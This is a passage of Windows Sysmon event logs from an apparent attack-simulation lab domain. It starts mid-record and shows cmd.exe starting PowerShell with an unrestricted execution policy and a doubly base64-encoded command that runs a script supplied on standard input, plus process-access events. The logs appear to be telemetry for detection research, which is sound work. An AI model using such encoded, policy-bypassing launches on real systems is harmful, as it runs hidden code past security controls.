UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.746","ProcessGuid":"{41C8662E-20CF-5F25-0000-00105DF80700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20CF-5F25-0000-00108EF70700}","ParentProcessId":"4092","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nSourceProcessId: 4092\r\nSourceThreadId: 4492\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00108EF70700}","SourceProcessId":"4092","SourceThreadId":"4492","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
